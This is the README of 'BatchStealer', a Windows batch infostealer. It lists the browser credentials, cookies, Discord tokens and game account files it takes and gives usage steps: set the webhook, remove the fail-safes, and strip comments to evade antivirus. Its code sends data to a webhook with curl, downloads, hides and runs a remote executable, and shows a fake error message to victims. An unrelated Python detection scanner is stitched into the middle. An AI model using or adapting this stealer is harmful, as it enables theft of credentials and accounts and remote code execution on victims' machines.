BatchStealer | BatchStealer Example
My attempt at making a stealer in batch; it sucks. The script will not be updated anymore. If anything, a new one would be made, this time properly. Treat the current BatchStealer as a POC, not as a finished product/malware.
3.4.2021: FUD (VirusTotal)
- Change the webhook to yours.
- Remove the fail-safes. ("goto xxx")
- Run the batch file.
- Do a regex search in Notepad++, match `^::.*\n` and replace with nothing.
- Just changing the webhook and doing nothing else.
- If the batch file does nothing the user will open it to see what's wrong.
Almost everything is encrypted; I haven't had the patience to do that in a batch file.
Full system information
- OS Name & Version
- Product ID
- System Manufacturer
- Processor(s)
- BIOS Version
- Time Zone
- Total Physical Memory
- Network Card(s)
- And more...
Chrome
- Cookies
- History
- Shortcuts
- Bookmarks
- Login Data
Opera
- Cookies
- History
- Shortcuts
- Bookmarks
- Login Data
Vivaldi
- Cookies
- History
- Shortcuts
- Bookmarks
- Login Data
Firefox
- Logins
- key3
- key4
- Cookies (Plain text!)
osu!
- osu!.cfg
Discord
- File containing a Token
- Other various files
Steam
- Logged in users (Username, email)
- Hidden ssfn files
Minecraft
- Launcher profiles and accounts
Growtopia
- Save.dat
Skip run by Task Scheduler
```batch
if not "%~dp0"=="%vpath%\" (
:: Your code not to get recurred
)
```
Fake error message
```batch
set "vpath="
...
:: FAKE ERROR MESSAGE | REMOVE GOTO IF YOU WANT IT TO DISPLAY
:: ----------------------------------------------------------
goto skipfakeerror
if not "%~dp0"=="%vpath%\" (
start /min /b mshta vbscript:Execute("Msgbox(""Bodytext""+vbCrLf+vbCrLf+""Anotherbody""),16,""Titletext"":window.close")
)
:skipfakeerror
...
```
Download & run payload
```batch
set "vpath="
set "webhook="
cd %vpath%
...
:: PAYLOAD - REMOVE GOTO IF YOU WANT THE SCRIPT TO DOWNLOAD AND RUN A FILE SOMEWHERE
:: ---------------------------------------------------------------------------------
goto skipcustomdownload
set "customdownloadurl=https://external.ext/file.exe"
set "customfilename=c.exe"
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Downloading and starting a custom file from\n%customdownloadurl% to %vpath%\%customfilename%```\"}" %webhook%
IF EXIST "%customfilename%" GOTO waitloop4
curl --silent -L --fail "%customdownloadurl%" -o "%customfilename%"
>NUL attrib "%vpath%\%customfilename%" +h
:waitloop4
IF EXIST "%customfilename%" GOTO waitloopend4
timeout /t 5 /nobreak > NUL
:waitloopend4
2> NUL start "%customfilename%"
:skipcustomdownload
...
```
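A defender-side check, added here as an example and not part of BatchStealer: the README itself notes that stripping `::` comment lines is enough to get the script past VirusTotal, so a scanner that keys on the command structure of the webhook POST, the `curl -L --fail ... -o` download, `attrib +h` and the `mshta vbscript:` popup, and ignores comments, is not defeated by that step. The indicator names, the `scan_batch`/`triage` functions and the sample file are constructed for this example.

```python
import re

# Command-structure patterns taken from the snippets in this README. Constructed
# for illustration; they are not a complete or authoritative signature set.
INDICATORS = {
    "webhook_exfil": re.compile(
        r'\bcurl\b.*-X\s+POST\b.*--data\s+"\{\\"content\\".*%webhook%', re.I),
    "remote_download": re.compile(
        r'\bcurl\b.*\s(?:-L|--location)\s.*--fail\b.*\s-o\s+"%\w+%"', re.I),
    "hide_dropped_file": re.compile(r'\battrib\b.*\+h\b', re.I),
    "mshta_vbscript": re.compile(r'\bmshta\s+vbscript:', re.I),
    "run_dropped_file": re.compile(
        r'^\s*(?:\d*>\s*NUL\s+)?start\s+"%\w+%"\s*$', re.I),
}

COMMENT = re.compile(r'^\s*(?:::|rem\b)', re.I)  # batch comment lines


def scan_batch(text):
    """Return {indicator: [1-based line numbers]} for every line that matches.

    Comment lines are skipped before matching, so deleting them (the README's
    own evasion step) leaves the set of matched indicators unchanged.
    """
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        if COMMENT.match(line):
            continue
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def triage(text):
    """Flag a file only when at least two distinct indicators co-occur;
    a lone webhook POST or attrib +h is common in benign admin scripts."""
    return "suspicious" if len(scan_batch(text)) >= 2 else "clean"


# Constructed sample assembled from the README's payload and fake-error snippets.
SAMPLE = r'''@echo off
set "vpath="
set "webhook="
:: PAYLOAD - REMOVE GOTO IF YOU WANT THE SCRIPT TO DOWNLOAD AND RUN A FILE SOMEWHERE
goto skipcustomdownload
set "customdownloadurl=https://external.ext/file.exe"
set "customfilename=c.exe"
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"Downloading %customdownloadurl%\"}" %webhook%
curl --silent -L --fail "%customdownloadurl%" -o "%customfilename%"
>NUL attrib "%vpath%\%customfilename%" +h
2> NUL start "%customfilename%"
:skipcustomdownload
start /min /b mshta vbscript:Execute("Msgbox(""Bodytext""),16,""Titletext"":window.close")
'''
```

Note that the sample still carries the `goto skipcustomdownload` fail-safe, so the payload is dead code at runtime; the scanner reports it anyway, which is the behaviour you want when triaging a script before it has been "armed".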
- Delete itself after execution
- Add itself to Task Scheduler (CMD window will be invisible when executed)
- Will make files to C:\ProgramData by default. (Hidden)
- Will make files to
- Push updates to infected machine(s) (Beta, expect bugs and crashes)
- Make sure the link points to a working batch file's source; it will replace everything.
- Ability to target specific users (Check username)
- Take screenshot
Included on the Automatic Builder
- Add garbage code (Confuse/Fill)
- Obfuscate
Not made yet.
- DNS poisoning
- Simple edit of the hosts file (Would require administrator)
- Other interesting stuff...
- If you want to support the project, open a pull request.
- The pull request could be a new steal, etc.
- You can try this
- Recurring does not work with the obfuscation. (Script exits when it reaches it)
- "Start as administrator" will make a visible error message on the CMD box.
None of the authors, contributors, or anyone else connected with this open source project, in any way whatsoever, can be responsible for your use of the information or the application contained in or linked from this repository.
Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use.
If you don't agree with any of our disclaimers above, do not read the code or download anything from our repository as you have no permission to read and explore our repository until you agree.